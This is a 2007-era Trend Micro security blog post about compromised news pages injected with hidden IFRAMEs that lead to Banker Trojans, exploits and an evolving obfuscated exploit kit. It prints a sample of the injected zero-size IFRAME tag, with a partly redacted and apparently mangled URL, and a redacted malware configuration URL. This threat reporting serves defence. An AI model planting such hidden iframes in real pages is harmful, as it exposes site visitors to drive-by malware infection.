Trend Micro Facebook TrendLabs Twitter Malware Blog RSS Feed You Tube - Trend Micro
Search our blog:

  • Recent Posts

  • Calendar

    November 2014
    S M T W T F S
    « Oct    
     1
    2345678
    9101112131415
    16171819202122
    23242526272829
    30  
  • About Us

    TrendLabs has identified more Web pages that have been compromised to contain an IFRAME tag that redirects users to a malicious IP address, leading to the downloading of malicious files. The compromised Web pages, which Trend Micro detects as HTML_IFRAME.GN, point to news articles regarding new technologies and, ironically, about the latest malware threats. The said articles even include a report about the recent Monster.com attack.

    The IFRAME tag that is inserted at the bottom of the page looks something like this:


    <iframe src=’http://extracare.trendmicro-europe.com/tm/core/global/images/diary/9fcefefdb019fc3e623c52a5cc74d986_81.{BLOCKED}.27/go.php?sid=1′ style=’border:0px solid
    gray;’ WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0
    SCROLLING=no></iframe>



    Trend Micro threat analysts report that this malicious IP address is owned by the Russian Business Network. At the time this attack was first reported, the downloaded files seem to be from Banker Trojan family and the data identified was requested from http:// 75.{BLOCKED}.148/.c/o/cfg.bin. As of this writing, however, it seems that it switched servers and is now attempting to download exploit codes, such as EXPL_EXECOD.A and EXPL_ANICMOO.GEN.


    Meanwhile, TrendLabs has also discovered a new Web threat attack kit, which pretty much works the same way as Web Attacker, Mpack, or Icepack. This is very similar to the Web threat kit discussed in The 404 Story, but this time, we have found nine exploit pages instead of seven, all of which ultimately lead to the downloading of the malicious file, VERS.PHP, which Trend Micro detects as TROJ_DLOADER.PGW.

    Based on the analysis by Senior Threat Expert Ivan Macalintal, the malicious obfuscated scripts at the exploit pages are still undetected. To make matters worse, the n404-X (where X is a number from 1 to 9) HTM pages evolve and change every other 5-10 minutes, thus producing more malicious pages (currently more than 130 sites and counting).

    Further investigation reveals that the malicious domain is again hosted by none other than the Russian Business Network. This one also uses VBScript; however, this time it has randomized variables that are probably different every time. Threat analyst David Sancho also noted how there was not a single line of code visible in the first infectious HTML. “These people are making extra efforts to prevent automated detection of JavaScript decoders,” he says.

    The complexity of its behavior makes it quite difficult to detect these pages because who knows how many more iterations and generations of malicious scripts can be produced. However, Trend Micro is continuously monitoring these malicious sites to include all undetected scripts and binaries to its signatures. Users are advised to watch out for these sites as they are still up and running as of this writing.





    Share this article
    Get the latest on malware protection from TrendLabs
    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   del.icio.us   StumbleUpon




    Comments are closed.



     

    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice